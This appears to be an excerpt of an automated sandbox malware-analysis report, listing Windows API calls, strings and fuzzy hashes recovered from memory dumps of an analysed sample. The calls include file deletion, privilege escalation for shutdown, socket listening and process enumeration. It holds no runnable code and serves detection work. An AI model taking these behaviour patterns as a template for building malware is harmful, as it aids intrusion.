                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                            • String ID: *.*
                                                            • API String ID: 713712311-438819550
                                                            • Opcode ID: 5673c62068c474e80cb618ce053e1361ac72973fa1e20d4d105ec75385ca9687
                                                            • Instruction ID: 1c4747e027382687f975798caebf45099589b8726f03cf3055cf1353905081c9
                                                            • Opcode Fuzzy Hash: 5673c62068c474e80cb618ce053e1361ac72973fa1e20d4d105ec75385ca9687
                                                            • Instruction Fuzzy Hash: 06418C7190021EAFCF54DF68CC45AFEBBBAFF15310F14446AE919A3291EB309A84CB54
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: __itow__swprintf
                                                            • String ID: 3cj$_j
                                                            • API String ID: 674341424-2927472950
                                                            • Opcode ID: 9133fc476166789c5891d5c9e42145816e97c8a697df6aeea372a70491eb3db6
                                                            • Instruction ID: 8c2d951abc1a437db31fe981c13b02bac8828bd39242bf18f3013eca084cf671
                                                            • Opcode Fuzzy Hash: 9133fc476166789c5891d5c9e42145816e97c8a697df6aeea372a70491eb3db6
                                                            • Instruction Fuzzy Hash: 83227B716083109FDB64EF24C881BAAB7E6EF89310F00492DF49A97391DB71ED45CB96
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID:
                                                            • API String ID: 4104443479-0
                                                            • Opcode ID: db2ff6783785281d58397abcbca5c0ef0a6ab58e5962b698a7702ec6a99cee39
                                                            • Instruction ID: 5915c1965853477726c4bf39d154dfac622577267b7b9b65525b413d569415a8
                                                            • Opcode Fuzzy Hash: db2ff6783785281d58397abcbca5c0ef0a6ab58e5962b698a7702ec6a99cee39
                                                            • Instruction Fuzzy Hash: BE128A70A00649EFEF04DFA5D981AEEB7F6FF49300F104569E806A7290EB39AD51CB54
                                                            APIs
                                                              • Part of subcall function 00694750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00694743,?,?,006937AE,?), ref: 00694770
                                                              • Part of subcall function 006F4A31: GetFileAttributesW.KERNEL32(?,006F370B), ref: 006F4A32
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 006F3B89
                                                            • DeleteFileW.KERNEL32(?,?,?,?), ref: 006F3BD9
                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 006F3BEA
                                                            • FindClose.KERNEL32(00000000), ref: 006F3C01
                                                            • FindClose.KERNEL32(00000000), ref: 006F3C0A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                            • String ID: \*.*
                                                            • API String ID: 2649000838-1173974218
                                                            • Opcode ID: 69acf1caf4b29f630429d911cb27cdd4116980e08566ead90606b00e69fa8d50
                                                            • Instruction ID: e597fdc749d1fad102e3545ef28838167c978fae9c2d1747ec22cc1d8712a5f4
                                                            • Opcode Fuzzy Hash: 69acf1caf4b29f630429d911cb27cdd4116980e08566ead90606b00e69fa8d50
                                                            • Instruction Fuzzy Hash: 9E319C710083999FC741EF64C8919FFB7AEBEA1314F404E2DF4D592291EB219A09C76B
                                                            APIs
                                                              • Part of subcall function 006E87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 006E882B
                                                              • Part of subcall function 006E87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 006E8858
                                                              • Part of subcall function 006E87E1: GetLastError.KERNEL32 ref: 006E8865
                                                            • ExitWindowsEx.USER32(?,00000000), ref: 006F51F9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                            • String ID: $@$SeShutdownPrivilege
                                                            • API String ID: 2234035333-194228
                                                            • Opcode ID: 4cf3f3bb6fed10519e0d38ae882ff24942952c5b3bf07ce77ba9ffff7347fbf0
                                                            • Instruction ID: cda3ea09f812dfd7170bcea7f52024073f765c668b2536d43ab2e177a127c14b
                                                            • Opcode Fuzzy Hash: 4cf3f3bb6fed10519e0d38ae882ff24942952c5b3bf07ce77ba9ffff7347fbf0
                                                            • Instruction Fuzzy Hash: B9014E317A1A1D6FF72862789C9BFFB725AEB05340F204635FB07E31D2DA511D0185A4
                                                            APIs
                                                            • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 007062DC
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 007062EB
                                                            • bind.WSOCK32(00000000,?,00000010), ref: 00706307
                                                            • listen.WSOCK32(00000000,00000005), ref: 00706316
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00706330
                                                            • closesocket.WSOCK32(00000000,00000000), ref: 00706344
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$bindclosesocketlistensocket
                                                            • String ID:
                                                            • API String ID: 1279440585-0
                                                            • Opcode ID: bd1621f2fc4c2a018866e6e832fc1d0a1b3bbf80b19be6c4b2beddcbf05c9296
                                                            • Instruction ID: 69c3a9ed87a802bc695ed2b6762e43b677b304d4633e3d2a6c3beda138c472be
                                                            • Opcode Fuzzy Hash: bd1621f2fc4c2a018866e6e832fc1d0a1b3bbf80b19be6c4b2beddcbf05c9296
                                                            • Instruction Fuzzy Hash: 60219E31600204DFCB10EF68C955A6EB7EAEF49720F14865DF816A72D1C778AD01CBA5
                                                            APIs
                                                              • Part of subcall function 006B0DB6: std::exception::exception.LIBCMT ref: 006B0DEC
                                                              • Part of subcall function 006B0DB6: __CxxThrowException@8.LIBCMT ref: 006B0E01
                                                            • _memmove.LIBCMT ref: 006E0258
                                                            • _memmove.LIBCMT ref: 006E036D
                                                            • _memmove.LIBCMT ref: 006E0414
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                            • String ID:
                                                            • API String ID: 1300846289-0
                                                            • Opcode ID: eb228f3db6b52c19363006bb8eaa21cdd68b269e671c73f7f68c25ebeb238523
                                                            • Instruction ID: edb51e40152bc5f4b35c14a26355846ea9e0259875c38610f6209a225e33c0a6
                                                            • Opcode Fuzzy Hash: eb228f3db6b52c19363006bb8eaa21cdd68b269e671c73f7f68c25ebeb238523
                                                            • Instruction Fuzzy Hash: 6F02CFB0A00209DFDF04DF65D981AAEBBB6EF45300F148069E80ADB395EB75DD91CB94
                                                            APIs
                                                              • Part of subcall function 00692612: GetWindowLongW.USER32(?,000000EB), ref: 00692623
                                                            • DefDlgProcW.USER32(?,?,?,?,?), ref: 006919FA
                                                            • GetSysColor.USER32(0000000F), ref: 00691A4E
                                                            • SetBkColor.GDI32(?,00000000), ref: 00691A61
                                                              • Part of subcall function 00691290: DefDlgProcW.USER32(?,00000020,?), ref: 006912D8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: ColorProc$LongWindow
                                                            • String ID:
                                                            • API String ID: 3744519093-0
                                                            • Opcode ID: 27ae5097f9af746535a89c35327bf3aa4f2d9b00ca1800d43630846595e338d3
                                                            • Instruction ID: cced630ee5a78dcf8e0527a5ab980b0fd7375b1d862f0c0684a563c9a3db2450
                                                            • Opcode Fuzzy Hash: 27ae5097f9af746535a89c35327bf3aa4f2d9b00ca1800d43630846595e338d3
                                                            • Instruction Fuzzy Hash: 28A14870102546BAEF28AB2C4C59EFF355FDB43341F34411EF402DEAD2CA289D4292B9
                                                            APIs
                                                              • Part of subcall function 00707D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00707DB6
                                                            • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0070679E
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 007067C7
                                                            • bind.WSOCK32(00000000,?,00000010), ref: 00706800
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 0070680D
                                                            • closesocket.WSOCK32(00000000,00000000), ref: 00706821
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                            • String ID:
                                                            • API String ID: 99427753-0
                                                            • Opcode ID: b563b2292eee26f32306305d9e1e708cf6ae3088cf49ed4bf5668a852b10ab49
                                                            • Instruction ID: 209c651a6749f760ae90b54269a8653a900c0c8f8d2f50574a364fe2019daa93
                                                            • Opcode Fuzzy Hash: b563b2292eee26f32306305d9e1e708cf6ae3088cf49ed4bf5668a852b10ab49
                                                            • Instruction Fuzzy Hash: 87419E75A00210AFDF90AF288886F7E77EA9F45714F04855CFA19AB3D2DA749D0087A5
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                            • String ID:
                                                            • API String ID: 292994002-0
                                                            • Opcode ID: 2f7aa01d39794f015fa4dd9b13a4e84df0d70ff0e76f62d56ea913f56dd01b7f
                                                            • Instruction ID: 8f370b3780ed8903a51fd783cdf5afb8ccf20908f6ed7d53bfbbea15f7454fbe
                                                            • Opcode Fuzzy Hash: 2f7aa01d39794f015fa4dd9b13a4e84df0d70ff0e76f62d56ea913f56dd01b7f
                                                            • Instruction Fuzzy Hash: 4B110431300910AFDB246F2EDC44AAEBB9EEF847A0B40842DF815D32C1DB78DC4186A8
                                                            APIs
                                                            • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 006E80C0
                                                            • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 006E80CA
                                                            • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 006E80D9
                                                            • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 006E80E0
                                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 006E80F6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                            • String ID:
                                                            • API String ID: 44706859-0
                                                            • Opcode ID: bd924b43b6f613030febf65d9b0ef95057dacbb3f5ccb41adab79c8e77a63a03
                                                            • Instruction ID: 6d8309f6c4c763c21e5ccd041cd19dad28bafac5602dd0f60c1b9293528cc6b2
                                                            • Opcode Fuzzy Hash: bd924b43b6f613030febf65d9b0ef95057dacbb3f5ccb41adab79c8e77a63a03
                                                            • Instruction Fuzzy Hash: C1F0C270241305BFEB104FA9EC8CEE73BADEF49754B008029F909C32A0DB649D11DA60
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,00694AD0), ref: 00694B45
                                                            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00694B57
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: GetNativeSystemInfo$kernel32.dll
                                                            • API String ID: 2574300362-192647395
                                                            • Opcode ID: 377fb98622cf5724a56b02258d63338a8cbd8fe497a2d8944db8e174dd10d7a4
                                                            • Instruction ID: ef224ff505431a188b68b92a99f24406668a1cb378ea03596324de190c9d3d53
                                                            • Opcode Fuzzy Hash: 377fb98622cf5724a56b02258d63338a8cbd8fe497a2d8944db8e174dd10d7a4
                                                            • Instruction Fuzzy Hash: 1AD0C2B0A00717DFCB208F39E818F8272E9AF00350B10C839D485C2694DA78D4C0C618
                                                            APIs
                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 0070EE3D
                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 0070EE4B
                                                              • Part of subcall function 00697DE1: _memmove.LIBCMT ref: 00697E22
                                                            • Process32NextW.KERNEL32(00000000,?), ref: 0070EF0B
                                                            • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0070EF1A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                            • String ID:
                                                            • API String ID: 2576544623-0
                                                            • Opcode ID: d475977fc1d238a20c25eeae570d79ae3f7171031fdc56d829e5acd3e271dd40
                                                            • Instruction ID: 8417e54f83587bb3a565760887f03699ae2a6d5dca11ce71f9e38760bdb47779
                                                            • Opcode Fuzzy Hash: d475977fc1d238a20c25eeae570d79ae3f7171031fdc56d829e5acd3e271dd40
                                                            • Instruction Fuzzy Hash: D951AD71104315AFD750EF24CC86EABB7ECEF94710F40492DF995972A1EB30A908CB96
                                                            APIs
                                                            • lstrlenW.KERNEL32(?,?,?,00000000), ref: 006EE628
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: lstrlen
                                                            • String ID: ($|
                                                            • API String ID: 1659193697-1631851259
                                                            • Opcode ID: dc9cdb2e37ba426c0f6c0196fffe83f9086734797bd328e6b1a47d551198e63a
                                                            • Instruction ID: 43dd2a758d788f870fbab6789b7f90321403ac9f1eb3194aa8b901a0510c5601
                                                            • Opcode Fuzzy Hash: dc9cdb2e37ba426c0f6c0196fffe83f9086734797bd328e6b1a47d551198e63a
                                                            • Instruction Fuzzy Hash: 89323675A017059FDB28CF1AC4819AAB7F1FF48320B15C46EE89ADB3A1E771E941CB44
                                                            APIs
                                                            • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0070180A,00000000), ref: 007023E1
                                                            • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00702418
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Internet$AvailableDataFileQueryRead
                                                            • String ID:
                                                            • API String ID: 599397726-0
                                                            • Opcode ID: d9a92e6a7057bd7b2a57ea6126b6def44eb384969a17b6f1eb2e132fd4b08262
                                                            • Instruction ID: 9611006c382ae4e087ae5961b9ff41d465f4b46f2771f9427cb8c6c87205ea51
                                                            • Opcode Fuzzy Hash: d9a92e6a7057bd7b2a57ea6126b6def44eb384969a17b6f1eb2e132fd4b08262
                                                            • Instruction Fuzzy Hash: BF4104B2904209FFEB20DE95DC89FBFB7ECEB40714F10416EF601A61C2DA789E429654
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 006FB343
                                                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 006FB39D
                                                            • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 006FB3EA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$DiskFreeSpace
                                                            • String ID:
                                                            • API String ID: 1682464887-0
                                                            • Opcode ID: db868b55967bb674b7ffd5d6a863502748ccfe6ffc2ce9f84ea5648a9918d49a
                                                            • Instruction ID: 1422730fb08edbab19dc65b1fe3361f8ca83b17300e990be669cf857fb8c056a
                                                            • Opcode Fuzzy Hash: db868b55967bb674b7ffd5d6a863502748ccfe6ffc2ce9f84ea5648a9918d49a
                                                            • Instruction Fuzzy Hash: 58216035A00518EFCF00EFA9D881AEDBBB9FF49310F1480AEE905AB351DB319915CB54
                                                            APIs
                                                              • Part of subcall function 006B0DB6: std::exception::exception.LIBCMT ref: 006B0DEC
                                                              • Part of subcall function 006B0DB6: __CxxThrowException@8.LIBCMT ref: 006B0E01
                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 006E882B
                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 006E8858
                                                            • GetLastError.KERNEL32 ref: 006E8865
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                            • String ID:
                                                            • API String ID: 1922334811-0
                                                            • Opcode ID: 66e21db4df77788476c31aeee35e1d7ca4cb147bf7c7a2e68018fd8202ed08d9
                                                            • Instruction ID: 31206e1362e8ac23e12809e40a87edcab507bfd7c269e7d35c774c000cdc6c56
                                                            • Opcode Fuzzy Hash: 66e21db4df77788476c31aeee35e1d7ca4cb147bf7c7a2e68018fd8202ed08d9
                                                            • Instruction Fuzzy Hash: B4116DB2414305AFE718DFA5DC85DABBBADEB44710B20C52EE85A97251EA30AC418B64
                                                            APIs
                                                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 006E8774
                                                            • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 006E878B
